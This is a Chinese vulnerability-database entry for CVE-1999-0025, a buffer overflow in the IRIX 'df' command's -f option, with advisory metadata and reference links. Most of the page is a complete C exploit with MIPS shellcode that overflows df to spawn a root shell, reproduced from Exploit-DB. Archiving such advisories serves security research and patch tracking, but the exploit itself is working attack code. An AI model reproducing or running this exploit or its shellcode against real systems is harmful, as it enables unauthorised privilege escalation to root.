IRIX df 漏洞

IRIX df 漏洞

漏洞ID 1105303 漏洞类型 缓冲区溢出
发布时间 1997-05-24 更新时间 2005-05-02
图片[1]-IRIX df 漏洞-安全小百科CVE编号 CVE-1999-0025
图片[2]-IRIX df 漏洞-安全小百科CNNVD-ID CNNVD-199707-028
漏洞平台 IRIX CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/19274
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199707-028
|漏洞详情
基于SGIIRIX系统的df命令存在缓冲区溢出漏洞。可以借助该漏洞获得根特权。
|漏洞EXP
source: http://www.securityfocus.com/bid/346/info

A buffer overflow exists in IRIX 5.x and 6.x 'df' utility, from Silicon Graphics Inc. By supplying a long argument to the -f option of df, a user can crash the df program. By carefully crafting a buffer containing machine executable code, an attacker can run arbitrary commands as root. 

/* /bin/df buffer overflow exploit by DCRH */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

#define BUF_LENGTH      1504
#define EXTRA           700
#define OFFSET          0x200
#define IRIX_NOP        0x03e0f825    /* move $ra,$ra */

#define u_long unsigned


u_long get_sp_code[] = {
    0x03a01025,         /* move $v0,$sp         */
    0x03e00008,         /* jr $ra               */
    0x00000000,         /* nop                  */
};

u_long irix_shellcode[] = {
    0x24041234,         /* li $4,0x1234         */
    0x2084edcc,         /* sub $4,0x1234        */
    0x0491fffe,         /* bgezal $4,pc-4       */
    0x03bd302a,         /* sgt $6,$sp,$sp       */
    0x23e4012c,         /* addi $4,$31,264+36   */
    0xa086feff,         /* sb $6,-264+7($4)     */
    0x2084fef8,         /* sub $4,264           */
    0x20850110,         /* addi $5,$4,264+8     */
    0xaca4fef8,         /* sw $4,-264($5)       */
    0xaca6fefc,         /* sw $4,-260($5)       */
    0x20a5fef8,         /* sub $5, 264          */
    0x240203f3,         /* li $v0,1011          */
    0x03ffffcc,         /* syscall 0xfffff      */
    0x2f62696e,         /* "/bin"               */
    0x2f7368ff,         /* "/sh"                */
};

char buf[BUF_LENGTH + EXTRA + 8];

void main(int argc, char **argv)
{
    char *env[] = {NULL};
    u_long targ_addr, stack;
    u_long *long_p;
    int i, code_length = strlen((char *)irix_shellcode)+1;
    u_long (*get_sp)(void) = (u_long (*)(void))get_sp_code;

    stack = get_sp();

    long_p =(u_long *)  buf;
    targ_addr = stack + OFFSET;

    if (argc > 1)
        targ_addr += atoi(argv[1]) * 4;

    while ((targ_addr & 0xff000000) == 0 ||
           (targ_addr & 0x00ff0000) == 0 ||
           (targ_addr & 0x0000ff00) == 0 ||
           (targ_addr & 0x000000ff) == 0)
        targ_addr += 4;

    for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
        *long_p++ = IRIX_NOP;

    for (i = 0; i < code_length/sizeof(u_long); i++)
        *long_p++ = irix_shellcode[i];

    for (i = 0; i < EXTRA / sizeof(u_long); i++)
        *long_p++ = (targ_addr << 16) | (targ_addr >> 16);

    *long_p = 0;

    printf("stack = 0x%x, targ_addr = 0x%xn", stack, targ_addr);

    execle("/bin/df", "df", &buf[3], 0, env);
    perror("execl failed");
}
|参考资料

来源:US-CERTVulnerabilityNote:VU#20851
名称:VU#20851
链接:http://www.kb.cert.org/vuls/id/20851
来源:CERT/CCAdvisory:CA-1997-21
名称:CA-1997-21
链接:http://www.cert.org/advisories/CA-1997-21.html
来源:XF
名称:df-bo(440)
链接:http://xforce.iss.net/xforce/xfdb/440
来源:BID
名称:346
链接:http://www.securityfocus.com/bid/346

相关推荐: TipxD 1.1.1 – Not SETUID Local Format String

TipxD 1.1.1 – Not SETUID Local Format String 漏洞ID 1054798 漏洞类型 发布时间 2004-12-14 更新时间 2004-12-14 CVE编号 N/A CNNVD-ID N/A 漏洞平台 Linux C…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享